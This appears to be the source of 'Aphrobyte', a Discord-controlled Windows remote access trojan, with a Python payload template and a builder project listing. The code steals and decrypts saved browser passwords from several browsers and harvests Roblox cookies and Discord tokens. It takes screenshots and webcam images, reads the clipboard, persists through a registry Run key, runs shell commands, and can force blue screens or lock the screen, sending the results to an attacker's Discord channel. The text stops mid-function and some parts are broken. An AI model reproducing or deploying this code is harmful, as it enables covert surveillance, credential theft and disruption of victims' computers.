├── .buildmodules
│   ├── exeic.ico
│   ├── requirements.txt
│   └── sample.py
├── App.config
├── Form1.Designer.cs
├── Form1.cs
├── Form1.resx
├── Program.cs
├── README.md
├── aphrobyte-discord-rat.csproj
├── aphrobyte-discord-rat.sln
└── aphrobytelogo.ico

/.buildmodules/exeic.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Riot-Byte/aphrobyte-rat/5bf2b09f581506049818009aefadc3de43881a21/.buildmodules/exeic.ico

--------------------------------------------------------------------------------
/.buildmodules/requirements.txt:
--------------------------------------------------------------------------------
PyInstaller
opencv-python
requests
colorama
termcolor
pycryptodome
pyautogui
discord
psutil
rotate-screen
pywin32
pywin32-ctypes
pypiwin32
pyperclip
tk
browser_cookie3
urllib3
pillow

--------------------------------------------------------------------------------
/.buildmodules/sample.py:
--------------------------------------------------------------------------------
1 | import pyautogui, cv2, time, threading, win32api, discord, requests,base64, os, json, psutil, ctypes,win32crypt, rotatescreen as rs, sys, winreg, subprocess, random, socket, pyperclip, tkinter as tk, tkinter.messagebox, browser_cookie3, inspect, urllib, shutil 2 | from discord.ext import commands 3 | from Crypto.Cipher import AES 4 | from ctypes import Structure, c_uint 5 | from re import findall 6 | 7 | intents = discord.Intents.all() 8 | client = commands.Bot(command_prefix='!', intents=intents) 9 | client.remove_command("help") 10 | 11 | ### CONFIGURATION 12 | 13 | token = "{token}" 14 | guild_id = "{guildid}" 15 | autostart = "{autostart}" 16 | antivm = "{antivm}" 17 | 18 | process_name = "{processname}" 19 | if not process_name.endswith(".exe"): 20 | process_name = process_name + ".exe" 21 | 22 | hide_after_exec = "{hideafterexec}" 23 | 24 | 
backdoor_location = "{backdoorlocation}" 25 | if backdoor_location == "\\AppData\\Roaming\\": 26 | backdoor_location = os.environ["appdata"] + "\\" + process_name 27 | else: 28 | backdoor_location = os.environ["appdata"] + "\\Microsoft\\" + process_name 29 | 30 | annc_channel_id = "{announcements}" 31 | pass_channel_id = annc_channel_id 32 | tokens_channel_id = annc_channel_id 33 | roblosecurity_channel_id = annc_channel_id 34 | 35 | ### CODE 36 | 37 | clientid = "" 38 | startup_enabled = False 39 | cookies = "" 40 | 41 | installationpath = sys._MEIPASS if getattr(sys, 'frozen', False) else os.path.dirname(os.path.abspath(__file__)) 42 | 43 | def admincheck(): 44 | val = ctypes.windll.shell32.IsUserAnAdmin() 45 | if val < 1: 46 | return False 47 | elif val > 0: 48 | return True 49 | 50 | 51 | help_menu = f""" 52 | Available commands for **{os.getlogin()}** : 53 | 54 | **!help** - Shows this message 55 | **!startup** - Adds the file to startup. 56 | **!exit** - Stop the RAT from working. 57 | **!usagelist** - Returns a list of active users. 58 | **!admin_check** - Checks if you are admin on target computer. 59 | **!bypass_uac** - Attempts to bypass UAC to get admin privileges. 60 | **!shell** - Run a shell command 61 | 62 | `-----SURVEILLANCE-----` 63 | 64 | **!screenshot** - Sends a screenshot of the target machine 65 | **!idletime** - Displays for how long the user has been AFK 66 | **!webcam_capture** - Capture a picture of the webcam. 67 | **!tasklist** - Returns a list of active tasks. 68 | 69 | `-----FILE MANAGEMENT-----` 70 | 71 | **!chdir** - Changes the current directory. **!chdir <** to go back one directory. 72 | **!chdisk** - Changes the current disk. (E, C, D, etc.) 73 | **!ls** - Displays all items in the current directory. 74 | **!download** - Downloads a file from the specified path. 75 | **!upload** - Uploads a file to the specified path. 76 | **!taskkill** - Kills the specified task. 77 | **!startfile** - Starts a file. 
78 | **!delfile** - Deletes a file. 79 | **!hidefile** \ **!unhidefile** - Hides/unhides a file. 80 | 81 | `-----INFORMATION GATHERING-----` 82 | 83 | **!whois** - Prints the user"s name 84 | **!getip** - Gets the current user's IP address 85 | **!clipboard** - Returns a string of the user's clipboard. 86 | **!grabpasswords** - Steal all the passwords from the device. 87 | **!grabroblox** - Grabs the user's Roblox account cookie. 88 | **!hardware_list** - Lists the user's hardware on newlines. 89 | """ 90 | 91 | help_menu2 = """ 92 | **!grabdiscord** - Fetches the user's Discord account token. 93 | 94 | `-----SANCTIONING-----` 95 | 96 | **!bsod** - Blue screens the computer. 97 | **!disabletaskmgr** \ **!enabletaskmanager** - Disable/enable task manager. 98 | **!logoff** - Logs the user off. 99 | **!shutdown** - Shuts the user's PC off. 100 | **!restart** - Restarts the user's PC. 101 | **!blockscreen** - Blocks the user's screen. (IRREVERSIBLE UNTIL USER RESTARTS) 102 | **!critproc** - Makes the RAT a critical process, meaning if it's task killed the user will get a BSOD. 103 | **!screenflip** - Rotates the user's screen 90 degrees. 104 | 105 | `-----FUN-----` 106 | 107 | **!write** - Writes a sentence then presses enter. 108 | **!setclipboard** - Sets the clipboard to the specified string of text. 109 | **!forcedesktop** - Sends the user on desktop automatically. 110 | **!messmouse** - Shakes the user's cursor when they try to move the mouse, run this command again to stop. 111 | **!opensite** - Opens a site on the user's browser. 112 | **!key_press** - Press a key. 113 | **!showtaskbar** \ **!hidetaskbar** 114 | 115 | `-----COMMUNICATION-----` 116 | 117 | **!questionmsg** - Sends the user a question message. 118 | **!warningmsg** - Sends the user a warning message. 119 | **!errormsg** - Sends the user an error message. 120 | **!infomsg** - Sends the user an informative message. 121 | 122 | ```* You need to specify the usage ID after every command. 
Arguments come after. 123 | 124 | Example : !write (usage-id) (sentence) => !write 123456 Test sentence 125 | !questionmsg (usage-id) (message) => !questionmsg 123456 Test Message 126 | ``` 127 | """ 128 | 129 | idedd = "" 130 | 131 | chars = "1234567890" 132 | clientid = "".join(random.sample(chars, 6)) 133 | 134 | class LASTINPUTINFO(Structure): 135 | _fields_ = [ 136 | ('cbSize', c_uint), 137 | ('dwTime', c_uint) 138 | ] 139 | 140 | def get_idle_duration(): 141 | idle_time = win32api.GetTickCount() - win32api.GetLastInputInfo() 142 | idle_time /= 1000 143 | return idle_time 144 | 145 | def takeScreenshot(): 146 | temp = os.getenv('temp') 147 | sc = pyautogui.screenshot() 148 | sc.save(temp + "\screenshot.png") 149 | 150 | def disable_task_manager(): 151 | registry_path = "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" 152 | registry_name = "DisableTaskMgr" 153 | value = 1 154 | 155 | try: 156 | reg_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, registry_path, 0, winreg.KEY_SET_VALUE) 157 | winreg.SetValueEx(reg_key, registry_name, 0, winreg.REG_SZ, value) 158 | winreg.CloseKey(reg_key) 159 | return True 160 | except WindowsError as e: 161 | return e 162 | 163 | def enable_task_manager(): 164 | registry_path = "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" 165 | registry_name = "DisableTaskMgr" 166 | value = 0 167 | 168 | try: 169 | reg_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, registry_path, 0, winreg.KEY_SET_VALUE) 170 | winreg.SetValueEx(reg_key, registry_name, 0, winreg.REG_SZ, value) 171 | winreg.CloseKey(reg_key) 172 | return True 173 | except WindowsError as e: 174 | return e 175 | 176 | @client.event 177 | async def on_ready(): 178 | with urllib.request.urlopen("https://geolocation-db.com/json") as url: 179 | ldata = json.loads(url.read().decode()) 180 | cflag = ldata['country_code'] 181 | ipaddress = ldata['IPv4'] 182 | 183 | output = os.popen("wmic os get name").read() 184 | if "Windows 10" in output: 185 | platform = 
"Windows 10" 186 | elif "Windows 11" in output: 187 | platform = "Windows 11" 188 | elif "Windows 8" in output: 189 | platform = "Windows 8" 190 | elif "Windows 7" in output: 191 | platform = "Windows 7" 192 | else: 193 | platform = "Unbound" 194 | 195 | user = os.getlogin() 196 | host_id = socket.gethostname() 197 | #guild = client.get_guild(int(guild_id)) 198 | channel = client.get_channel(int(annc_channel_id)) 199 | takeScreenshot() 200 | path = f"{os.getenv('temp')}\screenshot.png" 201 | await channel.send(f""" 202 | ||@everyone|| The RAT has sniped :flag_{cflag.lower()}: **{user}** :flag_{cflag.lower()}: with desktop ID **{host_id}**. 203 | 204 | ``` APHROBYTE RAT v1.9.2 | {client.user.name} | RIOT ADMINISTRATION ``` 205 | 206 | :skull_crossbones: `->` IP Address : ||{ipaddress}|| <- :flag_{cflag.lower()}: 207 | :skull_crossbones: `->` Admin privileges : **{admincheck()}** 208 | :skull_crossbones: `->` Auto startup : **{autostart}** 209 | :skull_crossbones: `->` OS : **{platform}** 210 | :skull_crossbones: `->` Usage ID : ||{clientid}|| 211 | 212 | ``` APHROBYTE RAT v1.9.2 | {client.user.name} | RIOT ADMINISTRATION ``` 213 | 214 | Help menu : **!help ||{clientid}||** 215 | Get list of active users : **!usagelist** 216 | 217 | RAT installed in : `{installationpath}` 218 | 219 | :point_down: **__USER SCREEN__** :point_down: 220 | """, file=discord.File(path)) 221 | os.remove(path) 222 | print(f'{client.user} is now online! 
Clientid {clientid}') 223 | 224 | 225 | 226 | @client.command() 227 | async def help(ctx, *, usid): 228 | if usid == clientid: 229 | await ctx.send(help_menu) 230 | await ctx.send(help_menu2) 231 | 232 | @client.command() 233 | async def screenshot(ctx, *, usid): 234 | if usid == clientid: 235 | takeScreenshot() 236 | path = f"{os.getenv('temp')}\screenshot.png" 237 | await ctx.send(f"Surveillance SS -> **{os.getlogin()}**:",file=discord.File(path)) 238 | os.remove(path) 239 | 240 | @client.command() 241 | async def write(ctx, usid, *, sentence): 242 | if usid == clientid: 243 | pyautogui.write(sentence) 244 | pyautogui.press('enter') 245 | await ctx.send(f"The user has now written **{sentence}** on their computer.") 246 | 247 | @client.command() 248 | async def whois(ctx, *, usid): 249 | if usid == clientid: 250 | user = os.getlogin() 251 | await ctx.send(f"You are on **{user}**'s computer") 252 | 253 | @client.command() 254 | async def getip(ctx, *, usid): 255 | if usid == clientid: 256 | with urllib.request.urlopen("https://geolocation-db.com/json") as url: 257 | ldata = json.loads(url.read().decode()) 258 | cflag = ldata['country_code'] 259 | ipaddress = ldata['IPv4'] 260 | await ctx.send(f"**{os.getlogin()}**'s IP is :flag_{cflag.lower()}: **{ipaddress}** :flag_{cflag.lower()}:") 261 | 262 | @client.command() 263 | async def exit(ctx, *, usid): 264 | if usid == clientid: 265 | await ctx.send(f"The RAT process has been killed on **{os.getlogin()}**'s machine.") 266 | sys.exit() 267 | 268 | @client.command() 269 | async def bsod(ctx, *, usid): 270 | if usid == clientid: 271 | ntdll = ctypes.windll.ntdll 272 | prev_value = ctypes.c_bool() 273 | res = ctypes.c_ulong() 274 | ntdll.RtlAdjustPrivilege(19, True, False, ctypes.byref(prev_value)) 275 | if not ntdll.NtRaiseHardError(0xDEADDEAD, 0, 0, 0, 6, ctypes.byref(res)): 276 | await ctx.send("BSOD failed with unexpected error.") 277 | else: 278 | await ctx.send(f"{os.getlogin()} has been blue screened.") 279 | 280 | 
@client.command() 281 | async def startup(ctx, *, usid): 282 | if usid == clientid: 283 | if startup_enabled != True: 284 | path = sys.argv[0] 285 | isexe = False 286 | if (sys.argv[0].endswith("exe")): 287 | isexe = True 288 | if isexe: 289 | if (sys.argv[0].endswith("exe")): 290 | if not os.path.exists(backdoor_location): 291 | shutil.copyfile(sys.executable, backdoor_location) 292 | subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "' + backdoor_location + '" /f', shell=True) 293 | await ctx.send(f"Added file to startup for **{os.getlogin()}**") 294 | elif startup_enabled == True: 295 | await ctx.send(f"Startup already enabled for **{os.getlogin()}**") 296 | 297 | @client.command() 298 | async def disabletaskmgr(ctx, *, usid): 299 | if usid == clientid: 300 | value = disable_task_manager() 301 | if value == True: 302 | await ctx.send(f"Task manager has been disabled for **{os.getlogin()}**") 303 | else: 304 | await ctx.send("Insufficient permissions.") 305 | 306 | @client.command() 307 | async def enabletaskmgr(ctx, *, usid): 308 | if usid == clientid: 309 | value = enable_task_manager() 310 | if value == True: 311 | await ctx.send(f"Task manager has been enabled for **{os.getlogin()}**") 312 | else: 313 | await ctx.send("Insufficient permissions.") 314 | 315 | @client.command() 316 | async def idletime(ctx, *, usid): 317 | if usid == clientid: 318 | idletime = get_idle_duration() 319 | if idletime < 1: 320 | await ctx.send(f"**{os.getlogin()}** isn't idle.") 321 | elif idletime >= 1: 322 | await ctx.send(f'Idletime for **{os.getlogin()}**: {str(idletime)}') 323 | 324 | @client.command() 325 | async def clipboard(ctx, *, usid): 326 | if usid == clientid: 327 | current_clipboard = str(pyperclip.paste()) 328 | await ctx.send(f"Clipboard content for **{os.getlogin()}** is : \n\n{current_clipboard}") 329 | 330 | 331 | def my_chrome_datetime(time_in_mseconds): 332 | return dt(1601, 1, 1) + 
timedelta(microseconds=int(time_in_mseconds)) 333 | 334 | def encryption_key(browser): 335 | localState_path = None 336 | if browser == "Chrome": 337 | localState_path = os.path.join(os.environ["USERPROFILE"], 338 | "AppData", "Local", "Google", "Chrome", 339 | "User Data", "Local State") 340 | elif browser == "Edge": 341 | localState_path = os.path.join(os.environ["USERPROFILE"], 342 | "AppData", "Local", "Microsoft", "Edge", 343 | "User Data", "Local State") 344 | elif browser == "Opera GX": 345 | localState_path = os.path.join(os.environ["APPDATA"], 346 | "Opera Software", "Opera GX Stable", 347 | "Local State") 348 | elif browser == "Opera": 349 | localState_path = os.path.join(os.environ["APPDATA"], 350 | "Opera Software", "Opera Stable", 351 | "Local State") 352 | 353 | elif browser == "Brave": 354 | localState_path = os.path.join(os.environ["LOCALAPPDATA"], 355 | "BraveSoftware", "Brave-Browser", 356 | "User Data", "Local State") 357 | 358 | with open(localState_path, "r", encoding="utf-8") as file: 359 | local_state_file = file.read() 360 | local_state_file = json.loads(local_state_file) 361 | 362 | ASE_key = base64.b64decode(local_state_file["os_crypt"]["encrypted_key"])[5:] 363 | return win32crypt.CryptUnprotectData(ASE_key, None, None, None, 0)[1] # decrypted key 364 | 365 | def decrypt_password(enc_password, key, browser): 366 | try: 367 | init_vector = enc_password[3:15] 368 | enc_password = enc_password[15:] 369 | cipher = AES.new(key, AES.MODE_GCM, init_vector) 370 | return cipher.decrypt(enc_password)[:-16].decode() 371 | except: 372 | try: 373 | return str(win32crypt.CryptUnprotectData(enc_password, None, None, None, 0)[1]) 374 | except: 375 | return "No passwords available (logged in with social account)" 376 | 377 | def steal_chrome_passwords(): 378 | password_db_path = [] 379 | 380 | if os.path.exists(f"{os.getenv('userprofile')}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"): 381 | 
password_db_path.append(os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "Default", "Login Data")) 382 | else: 383 | return {} 384 | 385 | for file in os.listdir(os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data")): 386 | if file.startswith("Profile"): 387 | profile_number = file 388 | password_db_path.append(os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", profile_number, "Login Data")) 389 | 390 | all_data = {} 391 | 392 | for password_path in password_db_path: 393 | shutil.copyfile(password_path, "my_chrome_data.db") 394 | db = sqlite3.connect("my_chrome_data.db") 395 | cursor = db.cursor() 396 | cursor.execute("SELECT origin_url, username_value, password_value, date_created FROM logins") 397 | encp_key = encryption_key("Chrome") 398 | data = {} 399 | for row in cursor.fetchall(): 400 | try: 401 | site_url = row[0] 402 | username = row[1] 403 | password = decrypt_password(row[2], encp_key, "Chrome") 404 | date_created = row[3] 405 | if username or password: 406 | if site_url not in data: 407 | data[site_url] = [] 408 | data[site_url].append( 409 | { 410 | "username": username, 411 | "password": password, 412 | "date_created": str(my_chrome_datetime(date_created)), 413 | } 414 | ) 415 | except: pass 416 | cursor.close() 417 | db.close() 418 | os.remove("my_chrome_data.db") 419 | 420 | all_data.update(data) 421 | 422 | return all_data 423 | 424 | 425 | def steal_firefox_passwords(): 426 | if not os.path.exists(os.path.join(os.environ["APPDATA"], "Mozilla", "Firefox", "Profiles")): 427 | return {} 428 | 429 | profiles = os.listdir(os.path.join(os.environ["APPDATA"], "Mozilla", "Firefox", "Profiles")) 430 | stolen_data = {} 431 | 432 | for profile in profiles: 433 | if profile.endswith(".default"): 434 | logins_path = os.path.join(os.path.join(os.environ["APPDATA"], "Mozilla", "Firefox", "Profiles"), profile, "logins.json") 435 | if 
os.path.isfile(logins_path): 436 | try: 437 | with open(logins_path, "r", encoding="utf-8") as file: 438 | logins_data = json.load(file) 439 | for login in logins_data["logins"]: 440 | site_url = login["hostname"] 441 | username = login["username"] 442 | password = login["password"] 443 | date_created = login["timeCreated"] 444 | if username or password: 445 | if site_url not in stolen_data: 446 | stolen_data[site_url] = [] 447 | stolen_data[site_url].append( 448 | { 449 | "username": username, 450 | "password": password, 451 | "date_created": str(my_chrome_datetime(date_created)), 452 | } 453 | ) 454 | except: pass 455 | return stolen_data 456 | 457 | def steal_edge_passwords(): 458 | 459 | if not os.path.exists(os.path.join(os.environ["LOCALAPPDATA"], "Microsoft", "Edge", "User Data", "Default", "Login Data")): 460 | return {} 461 | 462 | encp_key = encryption_key("Edge") 463 | 464 | shutil.copyfile(os.path.join(os.environ["LOCALAPPDATA"], "Microsoft", "Edge", "User Data", "Default", "Login Data"), "my_edge_data.db") 465 | db = sqlite3.connect("my_edge_data.db") 466 | cursor = db.cursor() 467 | cursor.execute("SELECT origin_url, username_value, password_value, date_created FROM logins") 468 | data = {} 469 | for row in cursor.fetchall(): 470 | try: 471 | site_url = row[0] 472 | username = row[1] 473 | password = decrypt_password(row[2], encp_key, "Edge") 474 | date_created = row[3] 475 | if username or password: 476 | if site_url not in data: 477 | data[site_url] = [] 478 | data[site_url].append( 479 | { 480 | "username": username, 481 | "password": password, 482 | "date_created": str(my_chrome_datetime(date_created)), 483 | } 484 | ) 485 | except: pass 486 | cursor.close() 487 | db.close() 488 | os.remove("my_edge_data.db") 489 | return data 490 | 491 | def steal_opera_gx_passwords(): 492 | 493 | if not os.path.exists(f'{os.getenv("APPDATA")}\\Opera Software\\Opera GX Stable\\Login Data'): 494 | return {} 495 | 496 | encp_key = encryption_key("Opera GX") 497 | 
498 | shutil.copyfile(os.path.join(os.environ["APPDATA"], "Opera Software", "Opera GX Stable", "Login Data"), "my_opera_data.db") 499 | db = sqlite3.connect("my_opera_data.db") 500 | cursor = db.cursor() 501 | cursor.execute("SELECT origin_url, username_value, password_value, date_created FROM logins") 502 | data = {} 503 | for row in cursor.fetchall(): 504 | try: 505 | site_url = row[0] 506 | username = row[1] 507 | password = decrypt_password(row[2], encp_key, "Opera") 508 | date_created = row[3] 509 | if username or password: 510 | if site_url not in data: 511 | data[site_url] = [] 512 | data[site_url].append( 513 | { 514 | "username": username, 515 | "password": password, 516 | "date_created": str(my_chrome_datetime(date_created)), 517 | } 518 | ) 519 | except: pass 520 | cursor.close() 521 | db.close() 522 | os.remove("my_opera_data.db") 523 | return data 524 | 525 | def steal_brave_passwords(): 526 | if not os.path.exists(os.path.join(os.environ["LOCALAPPDATA"], "BraveSoftware", "Brave-Browser", "User Data", "Default", "Login Data")): 527 | return {} 528 | 529 | encp_key = encryption_key("Brave") 530 | 531 | shutil.copyfile(os.path.join(os.environ["LOCALAPPDATA"], "BraveSoftware", "Brave-Browser", "User Data", "Default", "Login Data"), "my_brave_data.db") 532 | db = sqlite3.connect("my_brave_data.db") 533 | cursor = db.cursor() 534 | cursor.execute("SELECT origin_url, username_value, password_value, date_created FROM logins") 535 | data = {} 536 | for row in cursor.fetchall(): 537 | try: 538 | site_url = row[0] 539 | username = row[1] 540 | password = decrypt_password(row[2], encp_key, "Brave") 541 | date_created = row[3] 542 | if username or password: 543 | if site_url not in data: 544 | data[site_url] = [] 545 | data[site_url].append( 546 | { 547 | "username": username, 548 | "password": password, 549 | "date_created": str(my_chrome_datetime(date_created)), 550 | } 551 | ) 552 | except: pass 553 | cursor.close() 554 | db.close() 555 | 
os.remove("my_brave_data.db") 556 | return data 557 | 558 | def steal_opera_passwords(): 559 | if not os.path.exists(f'{os.getenv("APPDATA")}\\Opera Software\\Opera Stable\\Login Data'): 560 | return {} 561 | 562 | encp_key = encryption_key("Opera") 563 | 564 | shutil.copyfile(os.path.join(os.environ["APPDATA"], "Opera Software", "Opera Stable", "Login Data"), "my_opera_data.db") 565 | db = sqlite3.connect("my_opera_data.db") 566 | cursor = db.cursor() 567 | cursor.execute("SELECT origin_url, username_value, password_value, date_created FROM logins") 568 | data = {} 569 | for row in cursor.fetchall(): 570 | try: 571 | site_url = row[0] 572 | username = row[1] 573 | password = decrypt_password(row[2], encp_key, "Opera") 574 | date_created = row[3] 575 | if username or password: 576 | if site_url not in data: 577 | data[site_url] = [] 578 | data[site_url].append( 579 | { 580 | "username": username, 581 | "password": password, 582 | "date_created": str(my_chrome_datetime(date_created)), 583 | } 584 | ) 585 | except: pass 586 | cursor.close() 587 | db.close() 588 | os.remove("my_opera_data.db") 589 | return data 590 | 591 | def steal_passwords(): 592 | chrome_data = steal_chrome_passwords() 593 | firefox_data = steal_firefox_passwords() 594 | edge_data = steal_edge_passwords() 595 | operagx_data = steal_opera_gx_passwords() 596 | opera_data = steal_opera_passwords() 597 | brave_data = steal_brave_passwords() 598 | 599 | combined_data = {**chrome_data, **firefox_data, **edge_data, **operagx_data, **opera_data, **brave_data} 600 | 601 | if len(combined_data) > 0: 602 | return combined_data 603 | else: 604 | return {} 605 | 606 | 607 | 608 | def save_credentials_as_file(credentials_data): 609 | filename = f"{os.getlogin()}-passwords.txt" 610 | with open(filename, "w", encoding="utf8") as file: 611 | for site_url, credentials_list in credentials_data.items(): 612 | file.write(f"Site URL: {site_url}\n") 613 | for credentials in credentials_list: 614 | file.write(f"Username: 
{credentials['username']}\n") 615 | file.write(f"Password: {credentials['password']}\n") 616 | file.write(f"Date Created: {credentials['date_created']}\n") 617 | file.write("\n") 618 | return filename 619 | 620 | 621 | @client.command() 622 | async def grabpasswords(ctx): 623 | if usid == clientid: 624 | await ctx.send(f":hourglass: Started grabbing **{os.getlogin()}**'s passwords" 625 | file_path = save_credentials_as_file(data) 626 | try: 627 | with open(file_path, "r", encoding="utf8") as file: 628 | file_data = discord.File(file, filename="stolen_credentials.txt") 629 | except Exception as e: 630 | await ctx.send("Couldn't grab passwords for **{os.getlogin()}**: `{e}`") 631 | return 632 | await ctx.send(f":white_check_mark: Grabbed **{os.getlogin()}**'s passwords", file=file_data) 633 | 634 | 635 | @client.command() 636 | async def logoff(ctx, *, usid): 637 | if usid == clientid: 638 | os.system("shutdown /l /f") 639 | await ctx.send(f"**{os.getlogin()}** logged off.") 640 | 641 | @client.command() 642 | async def shutdown(ctx, *, usid): 643 | if usid == clientid: 644 | await ctx.send(f"**{os.getlogin()}**'s PC has been shut down.") 645 | os.system("shutdown /p") 646 | 647 | @client.command() 648 | async def setclipboard(ctx, usid, *, clipboard): 649 | if usid == clientid: 650 | try: 651 | pyperclip.copy(clipboard) 652 | except Exception as e: 653 | await ctx.send(f'Error trying to set clipboard for **{os.getlogin()}**: `{e}`') 654 | current_clipboard = str(pyperclip.paste()) 655 | await ctx.send(f'Successfully set the clipboard to **{current_clipboard}** for **{os.getlogin()}**') 656 | 657 | @client.command() 658 | async def forcedesktop(ctx, *, usid): 659 | if usid == clientid: 660 | pyautogui.keyDown('winleft') 661 | pyautogui.press('d') 662 | pyautogui.keyUp('winleft') 663 | await ctx.send(f"Sent **{os.getlogin()}** to the desktop.") 664 | 665 | @client.command() 666 | async def webcam_capture(ctx, *, usid): 667 | if usid == clientid: 668 | camera_count = 
cv2.getBuildInformation().count("Video I/O") 669 | if camera_count == 0: 670 | await ctx.send(f"No cameras found for **{os.getlogin()}**.") 671 | return 672 | 673 | cam_number = 0 674 | for camera_index in range(camera_count): 675 | camera = cv2.VideoCapture(camera_index) 676 | success, frame = camera.read() 677 | if success: 678 | cam_number = cam_number + 1 679 | image_path = f"camera_{camera_index}.jpg" 680 | cv2.imwrite(image_path, frame) 681 | 682 | with open(image_path, "rb") as file: 683 | picture = discord.File(file, filename=image_path) 684 | embed = discord.Embed(color=discord.Color.green()) 685 | embed.set_image(url=f"attachment://{image_path}") 686 | await ctx.send(content=f"**{os.getlogin()}**'s webcam - **Camera {str(cam_number)}**",embed=embed, file=picture) 687 | 688 | os.remove(image_path) 689 | 690 | camera.release() 691 | if cam_number == 0: 692 | await ctx.send(f"**{os.getlogin()}** has no webcam available.") 693 | 694 | def on_closing(): 695 | pass 696 | 697 | def screenblock(): 698 | box = tk.Tk() 699 | box.attributes('-fullscreen', True) 700 | box.attributes("-topmost", True) 701 | box.configure(background='black') 702 | box.protocol("WM_DELETE_WINDOW", on_closing) 703 | box.mainloop() 704 | 705 | @client.command() 706 | async def blockscreen(ctx, *, usid): 707 | if usid == clientid: 708 | threading.Thread(target=screenblock, daemon=True).start() 709 | await ctx.send(f"**{os.getlogin()}**'s screen has been blocked.") 710 | 711 | 712 | mousemess = False 713 | 714 | def StartMouseMess(): 715 | global mousemess 716 | while mousemess: 717 | x=random.randint(600, 700) 718 | y=random.randint(600, 700) 719 | pyautogui.moveTo(x, y, 3) 720 | time.sleep(1) 721 | 722 | @client.command() 723 | async def messmouse(ctx, *, usid): 724 | if usid == clientid: 725 | global mousemess 726 | if mousemess == False: 727 | mousemess = True 728 | threading.Thread(target=StartMouseMess,daemon=True).start() 729 | await ctx.send(f"Started messing **{os.getlogin()}**'s 
mouse.") 730 | elif mousemess == True: 731 | mousemess = False 732 | await ctx.send(f"Stopped messing **{os.getlogin()}**'s mouse.") 733 | 734 | 735 | @client.command() 736 | async def usagelist(ctx): 737 | list_usage = f"Active : **{os.getlogin()}** with desktop ID **{socket.gethostname()}** and usage ID **{clientid}**. Admin privileges : **{admincheck()}** `v1.9.2`" 738 | await ctx.send(list_usage) 739 | 740 | @client.command() 741 | async def questionmsg(ctx, usid, *, message): 742 | if usid == clientid: 743 | await ctx.send(f"Sent **{os.getlogin()}** a question message.") 744 | root = tkinter.Tk() 745 | root.wm_attributes("-topmost", 1) 746 | root.withdraw() 747 | response = tkinter.messagebox.askyesno("Question", message, parent=root) 748 | if response: 749 | await ctx.send(f"**{os.getlogin()}** has replied with **Yes** to your question which was `{message}`") 750 | root.destroy() 751 | else: 752 | await ctx.send(f"**{os.getlogin()}** has replied with **No** to your question which was `{message}`") 753 | root.destroy() 754 | 755 | @client.command() 756 | async def warningmsg(ctx, usid, *, message): 757 | if usid == clientid: 758 | await ctx.send(f"Sent **{os.getlogin()}** a warning message.") 759 | root = tkinter.Tk() 760 | root.wm_attributes("-topmost", 1) 761 | root.withdraw() 762 | tk.messagebox.showwarning(title='Warning', message=message, parent=root) 763 | await ctx.send(f"**{os.getlogin()}** saw the warning sent which was `{message}`") 764 | root.destroy() 765 | 766 | @client.command() 767 | async def errormsg(ctx, usid, *, message): 768 | if usid == clientid: 769 | await ctx.send(f"Sent **{os.getlogin()}** an error message.") 770 | root = tkinter.Tk() 771 | root.wm_attributes("-topmost", 1) 772 | root.withdraw() 773 | tk.messagebox.showerror(title='Error', message=message, parent=root) 774 | root.destroy() 775 | 776 | @client.command() 777 | async def infomsg(ctx, usid, *, message): 778 | if usid == clientid: 779 | await ctx.send(f"Sent 
**{os.getlogin()}** an informative message.") 780 | root = tkinter.Tk() 781 | root.wm_attributes("-topmost", 1) 782 | root.withdraw() 783 | tk.messagebox.showinfo(title='Information', message=message, parent=root) 784 | await ctx.send(f"**{os.getlogin()}** acknowledged the informative message sent which was `{message}`") 785 | root.destroy() 786 | 787 | @client.command() 788 | async def opensite(ctx, usid, *, website): 789 | if usid == clientid: 790 | os.system(f"start {website}") 791 | await ctx.send(f"Opened **{website}** for **{os.getlogin()}**") 792 | 793 | @client.command() 794 | async def admin_check(ctx, usid): 795 | value = admincheck() 796 | if usid == clientid: 797 | if value: 798 | await ctx.send(f"You have admin privileges against **{os.getlogin()}**") 799 | elif not value: 800 | await ctx.send(f"You do not have admin privileges against **{os.getlogin()}**") 801 | 802 | def cookieLogger(): 803 | 804 | data = [] 805 | 806 | try: 807 | cookies = browser_cookie3.firefox(domain_name='roblox.com') 808 | for cookie in cookies: 809 | if cookie.name == '.ROBLOSECURITY': 810 | data.append(cookies) 811 | data.append(cookie.value) 812 | return data 813 | except: 814 | pass 815 | try: 816 | cookies = browser_cookie3.chromium(domain_name='roblox.com') 817 | for cookie in cookies: 818 | if cookie.name == '.ROBLOSECURITY': 819 | data.append(cookies) 820 | data.append(cookie.value) 821 | return data 822 | except: 823 | pass 824 | 825 | try: 826 | cookies = browser_cookie3.edge(domain_name='roblox.com') 827 | for cookie in cookies: 828 | if cookie.name == '.ROBLOSECURITY': 829 | data.append(cookies) 830 | data.append(cookie.value) 831 | return data 832 | except: 833 | pass 834 | 835 | try: 836 | cookies = browser_cookie3.opera(domain_name='roblox.com') 837 | for cookie in cookies: 838 | if cookie.name == '.ROBLOSECURITY': 839 | data.append(cookies) 840 | data.append(cookie.value) 841 | return data 842 | except: 843 | pass 844 | 845 | try: 846 | cookies = 
